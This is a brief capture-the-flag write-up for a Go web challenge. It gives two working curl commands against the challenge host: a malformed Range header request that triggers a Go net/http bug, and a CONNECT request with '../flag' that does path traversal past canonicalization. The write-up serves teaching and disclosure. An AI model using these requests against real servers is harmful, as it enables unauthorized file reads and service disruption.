Rating: 5.0

TL;DR: https://github.com/golang/go/issues/40940

The intended solution: curl -H 'Range: bytes=--1' http://gofs.web.jctf.pro/IMG_1052.jpg

However, during the CTF one team solved it via an unintended way!:

$ curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag

Should have found that earlier and block it, but oh well :).

Turned out the CONNECT method does not perform the path canonicalization and it is actually documented in the Golang source code: https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364

Thanks to @themalwareman for pointing this out :)

Original writeup (https://twitter.com/disconnect3d_pl/status/1355969861231529985).